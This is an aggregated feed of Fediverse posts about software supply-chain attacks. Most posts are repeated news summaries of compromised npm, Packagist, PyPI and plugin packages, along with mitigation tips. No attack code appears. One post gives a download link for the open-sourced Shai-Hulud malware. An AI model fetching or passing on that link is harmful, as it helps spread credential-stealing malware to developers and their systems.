#supplychainattack — Public Fediverse posts
Live and recent posts from across the Fediverse tagged #supplychainattack, aggregated by home.social.
-
Personal computing safety goals because of supply chain attacks and possible future issues: create new user account for new projects, clone and test repos in that account only.
Is it hard? No. Could I automate it? maybe. Would it be nice to have built into say conda? Absolutely.
#cybersecurity #programming #supplyChainAttack #Linux #sysadmin -
Personal computing safety goals because of supply chain attacks and possible future issues: create new user account for new projects, clone and test repos in that account only.
Is it hard? No. Could I automate it? maybe. Would it be nice to have built into say conda? Absolutely.
#cybersecurity #programming #supplyChainAttack #Linux #sysadmin -
Personal computing safety goals because of supply chain attacks and possible future issues: create new user account for new projects, clone and test repos in that account only.
Is it hard? No. Could I automate it? maybe. Would it be nice to have built into say conda? Absolutely.
#cybersecurity #programming #supplyChainAttack #Linux #sysadmin -
Personal computing safety goals because of supply chain attacks and possible future issues: create new user account for new projects, clone and test repos in that account only.
Is it hard? No. Could I automate it? maybe. Would it be nice to have built into say conda? Absolutely.
#cybersecurity #programming #supplyChainAttack #Linux #sysadmin -
Personal computing safety goals because of supply chain attacks and possible future issues: create new user account for new projects, clone and test repos in that account only.
Is it hard? No. Could I automate it? maybe. Would it be nice to have built into say conda? Absolutely.
#cybersecurity #programming #supplyChainAttack #Linux #sysadmin -
📰 Packagist Supply Chain Attack Uses Clever Evasion to Infect PHP Projects with Linux Malware
🚨 PHP supply chain attack hits Packagist! 8+ packages compromised to drop Linux malware. Attackers hid malicious code in `package.json` to evade PHP security scanners. #SupplyChainAttack #PHP #Packagist #CyberSecurity
🌐 cyber[.]netsecops[.]io
-
📰 Packagist Supply Chain Attack Uses Clever Evasion to Infect PHP Projects with Linux Malware
🚨 PHP supply chain attack hits Packagist! 8+ packages compromised to drop Linux malware. Attackers hid malicious code in `package.json` to evade PHP security scanners. #SupplyChainAttack #PHP #Packagist #CyberSecurity
🌐 cyber[.]netsecops[.]io
-
📰 Packagist Supply Chain Attack Uses Clever Evasion to Infect PHP Projects with Linux Malware
🚨 PHP supply chain attack hits Packagist! 8+ packages compromised to drop Linux malware. Attackers hid malicious code in `package.json` to evade PHP security scanners. #SupplyChainAttack #PHP #Packagist #CyberSecurity
🌐 cyber[.]netsecops[.]io
-
📰 Packagist Supply Chain Attack Uses Clever Evasion to Infect PHP Projects with Linux Malware
🚨 PHP supply chain attack hits Packagist! 8+ packages compromised to drop Linux malware. Attackers hid malicious code in `package.json` to evade PHP security scanners. #SupplyChainAttack #PHP #Packagist #CyberSecurity
🌐 cyber[.]netsecops[.]io
-
📰 Packagist Supply Chain Attack Uses Clever Evasion to Infect PHP Projects with Linux Malware
🚨 PHP supply chain attack hits Packagist! 8+ packages compromised to drop Linux malware. Attackers hid malicious code in `package.json` to evade PHP security scanners. #SupplyChainAttack #PHP #Packagist #CyberSecurity
🌐 cyber[.]netsecops[.]io
-
GitHub-Hosted Malware Targets PHP Packages in Coordinated Supply Chain Attack
Malicious code was injected into eight PHP packages on Packagist, triggering a Linux binary download from GitHub Releases via JavaScript lifecycle hooks in package.json postinstall scripts. The attack was swiftly contained, with the malicious versions removed from Packagist.
-
✅ Create PRs to mitigate #npm #SupplyChainAttack via #npmrc file
https://github.com/phpactor/vscode-phpactor/pull/220
https://github.com/xdebug/vscode-php-debug/pull/1125
✅ Disable extension "auto update" and "auto update check" in #VSCode
-
✅ Create PRs to mitigate #npm #SupplyChainAttack via #npmrc file
https://github.com/phpactor/vscode-phpactor/pull/220
https://github.com/xdebug/vscode-php-debug/pull/1125
✅ Disable extension "auto update" and "auto update check" in #VSCode
-
✅ Create PRs to mitigate #npm #SupplyChainAttack via #npmrc file
https://github.com/phpactor/vscode-phpactor/pull/220
https://github.com/xdebug/vscode-php-debug/pull/1125
✅ Disable extension "auto update" and "auto update check" in #VSCode
-
🚨 A compromise affecting the community-maintained Laravel Lang project introduced remote code execution backdoors across multiple packages, including:
- Laravel-Lang/lang
- Laravel-Lang/http-statuses
- Laravel-Lang/actions
- Laravel-Lang/attributesAll tags were rewritten pointing to malicious commits
https://github.com/Laravel-Lang/lang/issues/8295
https://github.com/Laravel-Lang/common/issues/257
https://www.stepsecurity.io/blog/laravel-lang-supply-chain-attack
https://socket.dev/blog/laravel-lang-compromise
#PHP #Laravel #SupplyChainAttack #RemoteCodeExecution #RCE #Packagist
-
🚨 A compromise affecting the community-maintained Laravel Lang project introduced remote code execution backdoors across multiple packages, including:
- Laravel-Lang/lang
- Laravel-Lang/http-statuses
- Laravel-Lang/actions
- Laravel-Lang/attributesAll tags were rewritten pointing to malicious commits
https://github.com/Laravel-Lang/lang/issues/8295
https://github.com/Laravel-Lang/common/issues/257
https://www.stepsecurity.io/blog/laravel-lang-supply-chain-attack
https://socket.dev/blog/laravel-lang-compromise
#PHP #Laravel #SupplyChainAttack #RemoteCodeExecution #RCE #Packagist
-
🚨 A compromise affecting the community-maintained Laravel Lang project introduced remote code execution backdoors across multiple packages, including:
- Laravel-Lang/lang
- Laravel-Lang/http-statuses
- Laravel-Lang/actions
- Laravel-Lang/attributesAll tags were rewritten pointing to malicious commits
https://github.com/Laravel-Lang/lang/issues/8295
https://github.com/Laravel-Lang/common/issues/257
https://www.stepsecurity.io/blog/laravel-lang-supply-chain-attack
https://socket.dev/blog/laravel-lang-compromise
#PHP #Laravel #SupplyChainAttack #RemoteCodeExecution #RCE #Packagist
-
🚨 A compromise affecting the community-maintained Laravel Lang project introduced remote code execution backdoors across multiple packages, including:
- Laravel-Lang/lang
- Laravel-Lang/http-statuses
- Laravel-Lang/actions
- Laravel-Lang/attributesAll tags were rewritten pointing to malicious commits
https://github.com/Laravel-Lang/lang/issues/8295
https://github.com/Laravel-Lang/common/issues/257
https://www.stepsecurity.io/blog/laravel-lang-supply-chain-attack
https://socket.dev/blog/laravel-lang-compromise
#PHP #Laravel #SupplyChainAttack #RemoteCodeExecution #RCE #Packagist
-
🚨 A compromise affecting the community-maintained Laravel Lang project introduced remote code execution backdoors across multiple packages, including:
- Laravel-Lang/lang
- Laravel-Lang/http-statuses
- Laravel-Lang/actions
- Laravel-Lang/attributesAll tags were rewritten pointing to malicious commits
https://github.com/Laravel-Lang/lang/issues/8295
https://github.com/Laravel-Lang/common/issues/257
https://www.stepsecurity.io/blog/laravel-lang-supply-chain-attack
https://socket.dev/blog/laravel-lang-compromise
#PHP #Laravel #SupplyChainAttack #RemoteCodeExecution #RCE #Packagist
-
asking for at least $50,000 for the stolen data.
-
GitHub Actions Supply Chain Attack Exfiltrates CI/CD Credentials
A sneaky supply chain attack on GitHub Actions has led to the theft of CI/CD credentials, with hackers using a clever trick to redirect tags to fake commits that hide malicious code. By masquerading as legitimate commits, attackers were able to execute arbitrary code and evade pull request reviews.
#SupplyChainAttack #GithubActions #CicdCredentials #ImposterCommits #EmergingThreats
-
#OpenSource used to mean trusting skilled developers to build and maintain good #software so others did not need to learn every language, tool, or best practice themselves.
Now, #SupplyChainAttack and #AISlop have made many projects harder to trust.
Too much software is rushed, poorly understood, or built for hype instead of quality.
#Developers now spend more time checking code, #dependencies, and #maintainers instead of simply building software.
#AI was supposed to reduce cognitive load😒
-
🚨 Breaking news! 🚨 A supply chain attack on #npm shocks #developers worldwide, and in an utterly predictable twist, the only package manager where this "regularly happens" shrugs and says, "Oops, our bad." 😅 Devs are now collectively wringing their hands, wondering how they got #bamboozled by the same trick for the zillionth time. 🤦♂️
https://kevinpatel.xyz/posts/no-way-to-prevent-this/ #supplychainattack #security #shocked #oops #HackerNews #ngated -
🚨 Breaking news! 🚨 A supply chain attack on #npm shocks #developers worldwide, and in an utterly predictable twist, the only package manager where this "regularly happens" shrugs and says, "Oops, our bad." 😅 Devs are now collectively wringing their hands, wondering how they got #bamboozled by the same trick for the zillionth time. 🤦♂️
https://kevinpatel.xyz/posts/no-way-to-prevent-this/ #supplychainattack #security #shocked #oops #HackerNews #ngated -
🚨 Breaking news! 🚨 A supply chain attack on #npm shocks #developers worldwide, and in an utterly predictable twist, the only package manager where this "regularly happens" shrugs and says, "Oops, our bad." 😅 Devs are now collectively wringing their hands, wondering how they got #bamboozled by the same trick for the zillionth time. 🤦♂️
https://kevinpatel.xyz/posts/no-way-to-prevent-this/ #supplychainattack #security #shocked #oops #HackerNews #ngated -
🚨 Breaking news! 🚨 A supply chain attack on #npm shocks #developers worldwide, and in an utterly predictable twist, the only package manager where this "regularly happens" shrugs and says, "Oops, our bad." 😅 Devs are now collectively wringing their hands, wondering how they got #bamboozled by the same trick for the zillionth time. 🤦♂️
https://kevinpatel.xyz/posts/no-way-to-prevent-this/ #supplychainattack #security #shocked #oops #HackerNews #ngated -
🚨 Breaking news! 🚨 A supply chain attack on #npm shocks #developers worldwide, and in an utterly predictable twist, the only package manager where this "regularly happens" shrugs and says, "Oops, our bad." 😅 Devs are now collectively wringing their hands, wondering how they got #bamboozled by the same trick for the zillionth time. 🤦♂️
https://kevinpatel.xyz/posts/no-way-to-prevent-this/ #supplychainattack #security #shocked #oops #HackerNews #ngated -
#Socket detected a #supplychainattack on 84 #TanStack #npm packages, including popular ones like tanstack/react-router, which were compromised with suspected credential-stealing malware. The attack involved a chained #GitHub Actions attack and resulted in the publication of malicious packages authenticated through the project’s #OIDC trusted-publisher binding. https://socket.dev/blog/tanstack-npm-packages-compromised-mini-shai-hulud-supply-chain-attack?eicker.news #tech #media #news
-
#Socket detected a #supplychainattack on 84 #TanStack #npm packages, including popular ones like tanstack/react-router, which were compromised with suspected credential-stealing malware. The attack involved a chained #GitHub Actions attack and resulted in the publication of malicious packages authenticated through the project’s #OIDC trusted-publisher binding. https://socket.dev/blog/tanstack-npm-packages-compromised-mini-shai-hulud-supply-chain-attack?eicker.news #tech #media #news
-
#Socket detected a #supplychainattack on 84 #TanStack #npm packages, including popular ones like tanstack/react-router, which were compromised with suspected credential-stealing malware. The attack involved a chained #GitHub Actions attack and resulted in the publication of malicious packages authenticated through the project’s #OIDC trusted-publisher binding. https://socket.dev/blog/tanstack-npm-packages-compromised-mini-shai-hulud-supply-chain-attack?eicker.news #tech #media #news
-
#Socket detected a #supplychainattack on 84 #TanStack #npm packages, including popular ones like tanstack/react-router, which were compromised with suspected credential-stealing malware. The attack involved a chained #GitHub Actions attack and resulted in the publication of malicious packages authenticated through the project’s #OIDC trusted-publisher binding. https://socket.dev/blog/tanstack-npm-packages-compromised-mini-shai-hulud-supply-chain-attack?eicker.news #tech #media #news
-
#Socket detected a #supplychainattack on 84 #TanStack #npm packages, including popular ones like tanstack/react-router, which were compromised with suspected credential-stealing malware. The attack involved a chained #GitHub Actions attack and resulted in the publication of malicious packages authenticated through the project’s #OIDC trusted-publisher binding. https://socket.dev/blog/tanstack-npm-packages-compromised-mini-shai-hulud-supply-chain-attack?eicker.news #tech #media #news
-
TeamPCP has open sourced their Shai-Hulud project.
It can be downloaded here.
https://vx-underground.org/tmp
#cybersecurity #infosec #teampcp #shaihuludmalware #supplychainattack
-
TeamPCP has open sourced their Shai-Hulud project.
It can be downloaded here.
https://vx-underground.org/tmp
#cybersecurity #infosec #teampcp #shaihuludmalware #supplychainattack
-
TeamPCP has open sourced their Shai-Hulud project.
It can be downloaded here.
https://vx-underground.org/tmp
#cybersecurity #infosec #teampcp #shaihuludmalware #supplychainattack
-
🚨 UPDATE: Mini Shai-Hulud has crossed from #NPM into #ComposerPHP/#Packagist and now #PyPI… and is still spreading.
[email protected]
[email protected]https://socket.dev/blog/tanstack-npm-packages-compromised-mini-shai-hulud-supply-chain-attack
-
🚨 UPDATE: Mini Shai-Hulud has crossed from #NPM into #ComposerPHP/#Packagist and now #PyPI… and is still spreading.
[email protected]
[email protected]https://socket.dev/blog/tanstack-npm-packages-compromised-mini-shai-hulud-supply-chain-attack
-
🚨 UPDATE: Mini Shai-Hulud has crossed from #NPM into #ComposerPHP/#Packagist and now #PyPI… and is still spreading.
[email protected]
[email protected]https://socket.dev/blog/tanstack-npm-packages-compromised-mini-shai-hulud-supply-chain-attack
-
🚨 UPDATE: Mini Shai-Hulud has crossed from #NPM into #ComposerPHP/#Packagist and now #PyPI… and is still spreading.
[email protected]
[email protected]https://socket.dev/blog/tanstack-npm-packages-compromised-mini-shai-hulud-supply-chain-attack
-
🚨 UPDATE: Mini Shai-Hulud has crossed from #NPM into #ComposerPHP/#Packagist and now #PyPI… and is still spreading.
[email protected]
[email protected]https://socket.dev/blog/tanstack-npm-packages-compromised-mini-shai-hulud-supply-chain-attack
-
https://www.wiz.io/blog/mini-shai-hulud-strikes-again-tanstack-more-npm-packages-compromised
#CyberSecurity #InfoSec #SupplyChainSecurity #SoftwareSupplyChain #NPM #OpenSourceSecurity #AppSec #DevSecOps #ThreatIntel #Malware #JavaScript #NodeJS #CICD #GitHubActions #CloudSecurity #TypeScript #ReactJS #WebDev #OpenSource #DevTools #SoftwareEngineering #DeveloperSecurity #SecureCoding #GitHub #SupplyChainAttack #Programming #TechNews #DevOps #ApplicationSecurity #ThreatResearch #SecurityEngineering #CyberAttack #Hackers #MalwareAlert #SecurityResearch #DevCommunity -
https://www.wiz.io/blog/mini-shai-hulud-strikes-again-tanstack-more-npm-packages-compromised
#CyberSecurity #InfoSec #SupplyChainSecurity #SoftwareSupplyChain #NPM #OpenSourceSecurity #AppSec #DevSecOps #ThreatIntel #Malware #JavaScript #NodeJS #CICD #GitHubActions #CloudSecurity #TypeScript #ReactJS #WebDev #OpenSource #DevTools #SoftwareEngineering #DeveloperSecurity #SecureCoding #GitHub #SupplyChainAttack #Programming #TechNews #DevOps #ApplicationSecurity #ThreatResearch #SecurityEngineering #CyberAttack #Hackers #MalwareAlert #SecurityResearch #DevCommunity -
https://www.wiz.io/blog/mini-shai-hulud-strikes-again-tanstack-more-npm-packages-compromised
#CyberSecurity #InfoSec #SupplyChainSecurity #SoftwareSupplyChain #NPM #OpenSourceSecurity #AppSec #DevSecOps #ThreatIntel #Malware #JavaScript #NodeJS #CICD #GitHubActions #CloudSecurity #TypeScript #ReactJS #WebDev #OpenSource #DevTools #SoftwareEngineering #DeveloperSecurity #SecureCoding #GitHub #SupplyChainAttack #Programming #TechNews #DevOps #ApplicationSecurity #ThreatResearch #SecurityEngineering #CyberAttack #Hackers #MalwareAlert #SecurityResearch #DevCommunity -
https://www.wiz.io/blog/mini-shai-hulud-strikes-again-tanstack-more-npm-packages-compromised
#CyberSecurity #InfoSec #SupplyChainSecurity #SoftwareSupplyChain #NPM #OpenSourceSecurity #AppSec #DevSecOps #ThreatIntel #Malware #JavaScript #NodeJS #CICD #GitHubActions #CloudSecurity #TypeScript #ReactJS #WebDev #OpenSource #DevTools #SoftwareEngineering #DeveloperSecurity #SecureCoding #GitHub #SupplyChainAttack #Programming #TechNews #DevOps #ApplicationSecurity #ThreatResearch #SecurityEngineering #CyberAttack #Hackers #MalwareAlert #SecurityResearch #DevCommunity -
https://www.wiz.io/blog/mini-shai-hulud-strikes-again-tanstack-more-npm-packages-compromised
#CyberSecurity #InfoSec #SupplyChainSecurity #SoftwareSupplyChain #NPM #OpenSourceSecurity #AppSec #DevSecOps #ThreatIntel #Malware #JavaScript #NodeJS #CICD #GitHubActions #CloudSecurity #TypeScript #ReactJS #WebDev #OpenSource #DevTools #SoftwareEngineering #DeveloperSecurity #SecureCoding #GitHub #SupplyChainAttack #Programming #TechNews #DevOps #ApplicationSecurity #ThreatResearch #SecurityEngineering #CyberAttack #Hackers #MalwareAlert #SecurityResearch #DevCommunity -
Malware Targets TanStack npm Packages in Supply Chain Attack
Malware attackers have infiltrated the TanStack npm packages, modifying 84 artifacts in a supply chain attack that could compromise major developer ecosystems. The malicious code, aimed at stealing credentials, was published across 42 packages on May 11, with some, like @tanstack/react-router, downloaded over 12 million times…
#SupplyChainAttack #Tanstack #Npm #MalwareOperations #CredentialstealingMalware
-
تعرض الموقع الرسمي لـ JDownloader لاختراق أمني خطير، مما أدى إلى توزيع برمجيات خبيثة عبر روابط تثبيت ويندوز ولينكس لأكثر من يوم. استغل المهاجمون ثغرة غير مصححة لتعديل الروابط واستبدالها بملفات ضارة غير موقعة. بعد بلاغات المستخدمين وتحذيرات SmartScreen، تم إغلاق الموقع للتحقيق. لم تتأثر ملفات macOS والتحديثات عبر منصات مثل WinGet وFlatpak، وظلت آمنة. هذا الهجوم يمثل هجوم سلسلة توريد استغل سمعة JDownloader لنشر البرمجيات الخبيثة.
-
Checkmarx Plugin Compromised with Infostealer in Supply-Chain Attack
A rogue version of Checkmarx's Jenkins Application Security Testing plugin was compromised by the TeamPCP hacker group, who left a taunting message in the about section, claiming another supply-chain attack success. The group has been linked to a string of similar breaches, delivering credential-stealing malware.
#SupplyChainAttack #Teampcp #Jenkins #Checkmarx #Infostealer
-
Daemon Tools Software Trojanized in Supply Chain Attack
Malware was discovered hidden in certain Daemon Tools Lite installers, prompting developer Disc Soft to issue a clean build and confirm a supply chain attack had compromised their system. A malware-free version was released within 12 hours of notification.
#SupplyChainAttack #MalwareOperations #DaemonTools #EmergingThreats
-
CW: Détails techniques 3/9
Avantages (suite)
- #nobuild : pas de build requis (oubliez npm et autres package.json) : le code écrit est exactement celui qui est exécuté sur le navigateur sans transformation. Les libs sont inclues dans un dossier "vendor" et ne sont pas téléchargées via un gestionnaire de dépendances (évite les #supplychainattack)